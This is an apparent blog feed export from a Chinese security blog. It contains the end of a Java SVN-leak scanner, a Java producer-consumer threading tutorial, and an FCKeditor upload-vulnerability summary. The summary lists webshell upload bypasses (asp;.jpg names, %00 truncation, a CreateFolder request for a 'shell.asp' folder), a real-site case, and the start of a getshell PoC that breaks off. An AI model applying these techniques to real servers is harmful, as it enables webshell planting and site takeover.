class=&quot;line&quot;&gt;						 WriteToFile.fWriter(&lt;span class=&quot;string&quot;&gt;&quot;C:/Users/Administrator/Desktop/svnSuccess.txt&quot;&lt;/span&gt;, url);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;						 &lt;span class=&quot;keyword&quot;&gt;break&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;					 &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;				 &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;				 &amp;#125;&lt;span class=&quot;keyword&quot;&gt;finally&lt;/span&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;				 &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt;(reader!=&lt;span class=&quot;keyword&quot;&gt;null&lt;/span&gt;)&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;				 reader.close();&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;				 &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;				 &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt;(inr!=&lt;span class=&quot;keyword&quot;&gt;null&lt;/span&gt;)&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;				 inr.close();&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;				 &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;				 &lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt;(in!=&lt;span class=&quot;keyword&quot;&gt;null&lt;/span&gt;)&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;				 in.close();&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;				 &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;				 &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;keyword&quot;&gt;else&lt;/span&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&amp;#125; &lt;span class=&quot;keyword&quot;&gt;catch&lt;/span&gt; (IOException e) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;   &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;本文由HackBraid整理总结，如需转载请注明出处。&lt;/p&gt;
</content>
    
    <summary type="html">
    
      &lt;h2 id=&quot;0x01_背景&quot;&gt;0x01 背景&lt;/h2&gt;&lt;p&gt;引上一篇博文，对于多线程程序来说，不管任何编程语言，生产者和消费者模型都是最经典的。就像学习每一门编程语言你首先要输出Hello World一样，都是经典的例子。这里使用queue队列作为仓储，将生产者和消费者联系起来并模拟实现一个多线程提取SVN信息泄露漏洞的程序。&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/svn.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;
    
    </summary>
    
      <category term="编程开发" scheme="http://www.cnbraid.com/categories/%E7%BC%96%E7%A8%8B%E5%BC%80%E5%8F%91/"/>
    
    
      <category term="JAVA" scheme="http://www.cnbraid.com/tags/JAVA/"/>
    
      <category term="SVN" scheme="http://www.cnbraid.com/tags/SVN/"/>
    
      <category term="多线程" scheme="http://www.cnbraid.com/tags/%E5%A4%9A%E7%BA%BF%E7%A8%8B/"/>
    
  </entry>
  
  <entry>
    <title>Java基于queue的多线程模拟生产者消费者问题</title>
    <link href="http://www.cnbraid.com/2015/09/23/producerconsumer/"/>
    <id>http://www.cnbraid.com/2015/09/23/producerconsumer/</id>
    <published>2015-09-23T07:30:00.000Z</published>
    <updated>2016-05-03T05:42:09.432Z</updated>
    
    <content type="html">&lt;h2 id=&quot;0x01_并发协作（生产者消费者模型）&quot;&gt;0x01 并发协作（生产者消费者模型）&lt;/h2&gt;&lt;p&gt;对于多线程程序来说，不管任何编程语言，生产者和消费者模型都是最经典的。就像学习每一门编程语言你首先要输出Hello World一样，都是经典的例子。&lt;br&gt;生产者消费者模型准确的讲应该是”生产者-消费者-仓储”模型，离开了仓储这个介质，生产者和消费者也就没有了必然的联系。&lt;br&gt;这里使用queue队列作为仓储，将生产者和消费者联系起来并模拟实现一个简单的多线程并发协作的模型&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/6.JPG&quot; alt=&quot;&quot;&gt;&lt;br&gt;&lt;a id=&quot;more&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2 id=&quot;0x02_基于Queue的生产者消费者模型实现&quot;&gt;0x02 基于Queue的生产者消费者模型实现&lt;/h2&gt;&lt;figure class=&quot;highlight java&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;package&lt;/span&gt; com.thread;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;import&lt;/span&gt; java.util.concurrent.BlockingQueue;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;import&lt;/span&gt; java.util.concurrent.ExecutorService;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;import&lt;/span&gt; java.util.concurrent.Executors;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;import&lt;/span&gt; java.util.concurrent.LinkedBlockingQueue;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;comment&quot;&gt;/**&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt; * java基于queue多线程来模拟生产者消费者问题&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt; * &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt; * ProducerConsumer是主类，Producer生产者，Consumer消费者，Queue是商品&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt; * &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt; * &lt;span class=&quot;doctag&quot;&gt;@author&lt;/span&gt; braid&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt; * &lt;span class=&quot;doctag&quot;&gt;@time&lt;/span&gt; 2015-09-23&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt; */&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;public&lt;/span&gt; &lt;span class=&quot;class&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;title&quot;&gt;ProducerConsumer&lt;/span&gt; &lt;/span&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;function&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;public&lt;/span&gt; &lt;span class=&quot;keyword&quot;&gt;static&lt;/span&gt; &lt;span class=&quot;keyword&quot;&gt;void&lt;/span&gt; &lt;span class=&quot;title&quot;&gt;main&lt;/span&gt;&lt;span class=&quot;params&quot;&gt;(String[] args)&lt;/span&gt; &lt;/span&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		ProducerConsumer pc = &lt;span class=&quot;keyword&quot;&gt;new&lt;/span&gt; ProducerConsumer();&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		BlockingQueue&amp;lt;String&amp;gt; queue = &lt;span class=&quot;keyword&quot;&gt;new&lt;/span&gt; LinkedBlockingQueue&amp;lt;String&amp;gt;(&lt;span class=&quot;number&quot;&gt;5&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		ExecutorService service = Executors.newCachedThreadPool();&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		Producer p = pc.new Producer(&lt;span class=&quot;string&quot;&gt;&quot;王一&quot;&lt;/span&gt;, queue);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		Consumer c = pc.new Consumer(&lt;span class=&quot;string&quot;&gt;&quot;李二&quot;&lt;/span&gt;, queue);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		service.submit(p);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		service.submit(c);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;comment&quot;&gt;/**&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	 * 消费者&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	 * &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	 * &lt;span class=&quot;doctag&quot;&gt;@author&lt;/span&gt; braid&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	 * &lt;span class=&quot;doctag&quot;&gt;@time&lt;/span&gt; 2015-09-23&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	 */&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;class&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;title&quot;&gt;Consumer&lt;/span&gt; &lt;span class=&quot;keyword&quot;&gt;extends&lt;/span&gt; &lt;span class=&quot;title&quot;&gt;Thread&lt;/span&gt; &lt;/span&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&lt;span class=&quot;keyword&quot;&gt;private&lt;/span&gt; String name;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&lt;span class=&quot;keyword&quot;&gt;private&lt;/span&gt; BlockingQueue&amp;lt;String&amp;gt; queue = &lt;span class=&quot;keyword&quot;&gt;null&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&lt;span class=&quot;function&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;public&lt;/span&gt; &lt;span class=&quot;title&quot;&gt;Consumer&lt;/span&gt;&lt;span class=&quot;params&quot;&gt;(String name, BlockingQueue&amp;lt;String&amp;gt; queue)&lt;/span&gt; &lt;/span&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;keyword&quot;&gt;this&lt;/span&gt;.name = name;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;keyword&quot;&gt;this&lt;/span&gt;.queue = queue;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&lt;span class=&quot;function&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;public&lt;/span&gt; &lt;span class=&quot;keyword&quot;&gt;void&lt;/span&gt; &lt;span class=&quot;title&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;params&quot;&gt;()&lt;/span&gt; &lt;/span&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;keyword&quot;&gt;while&lt;/span&gt; (&lt;span class=&quot;keyword&quot;&gt;true&lt;/span&gt;) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;				&lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (queue.isEmpty())&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;					&lt;span class=&quot;keyword&quot;&gt;break&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;				String product;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;				&lt;span class=&quot;keyword&quot;&gt;try&lt;/span&gt; &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;					product = queue.take();&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;					System.out.println(name + &lt;span class=&quot;string&quot;&gt;&quot;消费商品：&quot;&lt;/span&gt; + product);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;					Thread.sleep(&lt;span class=&quot;number&quot;&gt;500&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;				&amp;#125; &lt;span class=&quot;keyword&quot;&gt;catch&lt;/span&gt; (InterruptedException e) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;					&lt;span class=&quot;comment&quot;&gt;// TODO Auto-generated catch block&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;					e.printStackTrace();&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;				&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;comment&quot;&gt;/**&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	 * 生产者&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	 * &lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	 * &lt;span class=&quot;doctag&quot;&gt;@author&lt;/span&gt; braid&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	 * &lt;span class=&quot;doctag&quot;&gt;@time&lt;/span&gt; 2015-09-23&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	 */&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;class&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;title&quot;&gt;Producer&lt;/span&gt; &lt;span class=&quot;keyword&quot;&gt;extends&lt;/span&gt; &lt;span class=&quot;title&quot;&gt;Thread&lt;/span&gt; &lt;/span&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&lt;span class=&quot;keyword&quot;&gt;private&lt;/span&gt; String name;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&lt;span class=&quot;keyword&quot;&gt;private&lt;/span&gt; BlockingQueue&amp;lt;String&amp;gt; queue = &lt;span class=&quot;keyword&quot;&gt;null&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&lt;span class=&quot;function&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;public&lt;/span&gt; &lt;span class=&quot;title&quot;&gt;Producer&lt;/span&gt;&lt;span class=&quot;params&quot;&gt;(String name, BlockingQueue&amp;lt;String&amp;gt; queue)&lt;/span&gt; &lt;/span&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;keyword&quot;&gt;this&lt;/span&gt;.name = name;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;keyword&quot;&gt;this&lt;/span&gt;.queue = queue;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&lt;span class=&quot;function&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;public&lt;/span&gt; &lt;span class=&quot;keyword&quot;&gt;void&lt;/span&gt; &lt;span class=&quot;title&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;params&quot;&gt;()&lt;/span&gt; &lt;/span&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;comment&quot;&gt;// while(true)会造成阻塞，应该根据实际需要设定条件&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;keyword&quot;&gt;while&lt;/span&gt; (&lt;span class=&quot;keyword&quot;&gt;true&lt;/span&gt;) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;				String product = &lt;span class=&quot;string&quot;&gt;&quot;product&quot;&lt;/span&gt; + (&lt;span class=&quot;keyword&quot;&gt;int&lt;/span&gt;) (Math.random() * &lt;span class=&quot;number&quot;&gt;10000&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;				&lt;span class=&quot;keyword&quot;&gt;try&lt;/span&gt; &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;					queue.put(product);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;					System.out.println(name + &lt;span class=&quot;string&quot;&gt;&quot;已生产：&quot;&lt;/span&gt; + product);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;					Thread.sleep(&lt;span class=&quot;number&quot;&gt;500&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;				&amp;#125; &lt;span class=&quot;keyword&quot;&gt;catch&lt;/span&gt; (InterruptedException e) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;					&lt;span class=&quot;comment&quot;&gt;// TODO Auto-generated catch block&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;					e.printStackTrace();&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;				&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;本文由HackBraid整理总结，如需转载请注明出处。&lt;/p&gt;
</content>
    
    <summary type="html">
    
      &lt;h2 id=&quot;0x01_并发协作（生产者消费者模型）&quot;&gt;0x01 并发协作（生产者消费者模型）&lt;/h2&gt;&lt;p&gt;对于多线程程序来说，不管任何编程语言，生产者和消费者模型都是最经典的。就像学习每一门编程语言你首先要输出Hello World一样，都是经典的例子。&lt;br&gt;生产者消费者模型准确的讲应该是”生产者-消费者-仓储”模型，离开了仓储这个介质，生产者和消费者也就没有了必然的联系。&lt;br&gt;这里使用queue队列作为仓储，将生产者和消费者联系起来并模拟实现一个简单的多线程并发协作的模型&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/6.JPG&quot; alt=&quot;&quot;&gt;&lt;br&gt;
    
    </summary>
    
      <category term="编程开发" scheme="http://www.cnbraid.com/categories/%E7%BC%96%E7%A8%8B%E5%BC%80%E5%8F%91/"/>
    
    
      <category term="JAVA" scheme="http://www.cnbraid.com/tags/JAVA/"/>
    
      <category term="多线程" scheme="http://www.cnbraid.com/tags/%E5%A4%9A%E7%BA%BF%E7%A8%8B/"/>
    
      <category term="生产者消费者" scheme="http://www.cnbraid.com/tags/%E7%94%9F%E4%BA%A7%E8%80%85%E6%B6%88%E8%B4%B9%E8%80%85/"/>
    
  </entry>
  
  <entry>
    <title>FCKeditor上传漏洞总结</title>
    <link href="http://www.cnbraid.com/2015/07/09/fckeditor/"/>
    <id>http://www.cnbraid.com/2015/07/09/fckeditor/</id>
    <published>2015-07-09T02:39:50.000Z</published>
    <updated>2016-06-24T08:56:03.589Z</updated>
    
    <content type="html">&lt;h2 id=&quot;0x01_FCKeditor简介&quot;&gt;0x01 FCKeditor简介&lt;/h2&gt;&lt;p&gt;FCKeditor是一个专门使用在网页上属于开放源代码的所见即所得文字编辑器。它志于轻量化，不需要太复杂的安装步骤即可使用。它可和PHP、 JavaScript、ASP、ASP.NET、ColdFusion、Java、以及ABAP等不同的编程语言相结合。“FCKeditor”名称中的 “FCK” 是这个编辑器的作者的名字Frederico Caldeira Knabben的缩写。FCKeditor 相容于绝大部分的网页浏览器，像是 : Internet Explorer 5.5+ (Windows)、Mozilla Firefox 1.0+、Mozilla 1.3+ 和 Netscape 7+。在未来的版本也将会加入对 Opera 的支援。&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/f.jpg&quot; alt=&quot;&quot;&gt;&lt;br&gt;&lt;a id=&quot;more&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2 id=&quot;0x02_判断版本&quot;&gt;0x02 判断版本&lt;/h2&gt;&lt;p&gt;常见判断版本方法有两个：&lt;br&gt;/fckeditor/editor/dialog/fck_about.html&lt;br&gt;/FCKeditor/_whatsnew.html&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/f1.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h2 id=&quot;0x03_上传地址&quot;&gt;0x03 上传地址&lt;/h2&gt;&lt;h3 id=&quot;常用的上传地址A&quot;&gt;常用的上传地址A&lt;/h3&gt;&lt;blockquote&gt;
&lt;p&gt;FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&amp;amp;Type=Image&amp;amp;CurrentFolder=/&lt;br&gt;FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&amp;amp;connector=connectors/asp/connector.asp&lt;br&gt;FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&amp;amp;Connector=&lt;a href=&quot;http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php&lt;/a&gt; (ver:2.6.3 测试通过)&lt;br&gt;FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&amp;amp;Connector=connectors/jsp/connector.jsp&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id=&quot;常用的上传地址B&quot;&gt;常用的上传地址B&lt;/h3&gt;&lt;blockquote&gt;
&lt;p&gt;FCKeditor/editor/filemanager/browser/default/connectors/test.html&lt;br&gt;FCKeditor/editor/filemanager/upload/test.html&lt;br&gt;FCKeditor/editor/filemanager/connectors/test.html&lt;br&gt;FCKeditor/editor/filemanager/connectors/uploadtest.html &lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id=&quot;0x04_上传方法&quot;&gt;0x04 上传方法&lt;/h2&gt;&lt;h3 id=&quot;ASP版&quot;&gt;ASP版&lt;/h3&gt;&lt;p&gt;asp一般是搭在windows主机上，webserver一般为IIS6/IIS7/IIS7.5。据我现在所知，asp版的fckeditor已经可以全秒了。&lt;/p&gt;
&lt;p&gt;&amp;lt;2.4.x版本（也就是2.4.x及以下）的File参数时为黑名单验证，可以通过上传.asa、.cer、.asp;jpg（针对IIS6）。如果asa、cer不被解析，还可以传.asp[空格]。传的方法就是抓包然后在数据包里的文件名后填个空格。&lt;/p&gt;
&lt;p&gt;2.5.x和2.6.x：如果是IIS6.0 ，可以通过突破变”.”为”_”限制创建.asp文件夹，代码如下：&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&amp;amp;Type=File&amp;amp;CurrentFolder=%2Fshell.asp&amp;amp;NewFolderName=z.asp&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;复制代码然后往这个文件夹里传jpg，这个不多说了。&lt;/p&gt;
&lt;p&gt;如果是IIS7及以上，这种方法就傻逼了。这个时候可以借助刚爆出来的那种方法，先传shell.asp%00txt，然后再传一次。&lt;/p&gt;
&lt;p&gt;至此，asp版本已经全秒了。&lt;/p&gt;
&lt;h3 id=&quot;ASPX版&quot;&gt;ASPX版&lt;/h3&gt;&lt;p&gt;低版本同ASP版，2.6.x用刚爆出来的二次上传已经不好使了，不过新建test.asp的文件夹还可以使。一般IIS6.0会支持asp，可以先传个asp上去，然后再XX。&lt;/p&gt;
&lt;h3 id=&quot;PHP版&quot;&gt;PHP版&lt;/h3&gt;&lt;p&gt;1.低版本（2.4.x及以下），仍然为黑名单验证，windows主机可以使用php[空格]传，2.4.3的有个media未设置导致任意文件上传可以秒linux。&lt;/p&gt;
&lt;p&gt;2.2.5.x以后是白名单验证，仅能寄希望于wooyun里爆的那个&amp;lt;2.6.4的任意文件上传，成功率有限。&lt;/p&gt;
&lt;p&gt;3.2.6.4以上的php版，据我所知没戏，求高人指点！我粗略的看了一下它的验证逻辑，表示没戏，windows里的敏感字符全给过滤了。&lt;/p&gt;
&lt;h2 id=&quot;0x05_实战案例&quot;&gt;0x05 实战案例&lt;/h2&gt;&lt;h3 id=&quot;【aspx+2-6-4】&quot;&gt;【aspx+2.6.4】&lt;/h3&gt;&lt;p&gt;1.上传地址：&lt;a href=&quot;http://***/FCKeditor/_samples/default.html&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://***/FCKeditor/_samples/default.html&lt;/a&gt;&lt;br&gt;2.上传shell.asp;.jpg变shell_asp;.jpg，然后继续上传同名文件可变为shell.asp;(1).jpg&lt;br&gt;3.shell地址：&lt;a href=&quot;http://***/userfiles/shell.asp;(1).jpg&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://***/userfiles/shell.asp;(1).jpg&lt;/a&gt;&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/f2.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h3 id=&quot;【PHP+2-4-3】&quot;&gt;【PHP+2.4.3】&lt;/h3&gt;&lt;p&gt;1.Linux服务器，利用media未设置导致任意文件上传，测试POC为：&lt;br&gt;&lt;figure class=&quot;highlight php&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;preprocessor&quot;&gt;&amp;lt;?php&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;print_r(&lt;span class=&quot;string&quot;&gt;&#39;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;      +--------------------------------------------------------------+&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;                  NS-ASG Getshell  Exploit&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;      +--------------------------------------------------------------+&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&#39;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (&lt;span class=&quot;variable&quot;&gt;$argc&lt;/span&gt; &amp;lt; &lt;span class=&quot;number&quot;&gt;2&lt;/span&gt;) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;      print_r(&lt;span class=&quot;string&quot;&gt;&#39;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;      +--------------------------------------------------------------+&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;                  